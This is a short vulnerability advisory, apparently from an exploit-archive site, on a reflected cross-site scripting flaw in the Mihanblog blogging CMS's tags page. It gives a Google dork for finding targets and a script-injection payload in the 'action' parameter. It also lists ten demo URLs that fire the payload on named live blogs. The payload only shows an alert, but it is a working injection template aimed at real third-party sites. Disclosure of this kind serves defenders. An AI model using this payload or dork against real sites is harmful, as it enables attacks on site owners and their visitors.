Mihanblog cross-site scripting vulnerability

2017.10.21
de Milad Ahmadi (DE) de
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A
Dork: inurl:".mihanblog.com"

[-] Exploit Title: Mihanblog cross-site scripting vulnerability [-] Vendor Homepage: http://www.mihanblog.com/ [-] Google Dork: inurl:".mihanblog.com" [-] Author: Milad Ahmadi [-] Date: 2017-10-21 [-] Version: All [-] Tested on Windows 10 --------------------------------------------------------------------- [ Description ] # Mihanblog blogging system is one of the products of Saba idea(www.sabaidea.com) company . this company is the creator of Aparat , Filimo , Cloob and Lenzor service. this popular blogging cms is vulnerable to cross-site scripting attacks in tags page with action parameter. --------------------------------------------------------------------- [ Proof Of Concept] http://site.com/post/tag/[ tagname ]/page/[ page id ]?action=1"></script><script>alert(0)</script> --------------------------------------------------------------------- [ Demo ] http://mashhad.mihanblog.com//post/tag/tagname/page/1?action=1%22%3E%3C/script%3E%3Cscript%3Ealert(0)%3C/script%3E http://vizvizak.mihanblog.com//post/tag/tagname/page/1?action=1%22%3E%3C/script%3E%3Cscript%3Ealert(0)%3C/script%3E http://feda.mihanblog.com/post/tag/tagname/page/1?action=1%22%3E%3C/script%3E%3Cscript%3Ealert(0)%3C/script%3E http://borazjani.mihanblog.com/post/tag/tagname/page/1?action=1%22%3E%3C/script%3E%3Cscript%3Ealert(0)%3C/script%3E http://mohammad-erfan.mihanblog.com/post/tag/tagname/page/1?action=1%22%3E%3C/script%3E%3Cscript%3Ealert(0)%3C/script%3E http://doshman-1.mihanblog.com/post/tag/tagname/page/1?action=1%22%3E%3C/script%3E%3Cscript%3Ealert(0)%3C/script%3E http://dost-1.mihanblog.com/post/tag/tagname/page/1?action=1%22%3E%3C/script%3E%3Cscript%3Ealert(0)%3C/script%3E http://best--poems.mihanblog.com//post/tag/tagname/page/1?action=1%22%3E%3C/script%3E%3Cscript%3Ealert(0)%3C/script%3E http://sajadsport13841384.mihanblog.com/post/tag/tagname/page/1?action=1%22%3E%3C/script%3E%3Cscript%3Ealert(0)%3C/script%3E http://30arg.mihanblog.com//post/tag/tagname/page/1?action=1%22%3E%3C/script%3E%3Cscript%3Ealert(0)%3C/script%3E ---------------------------------------------------------------------


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top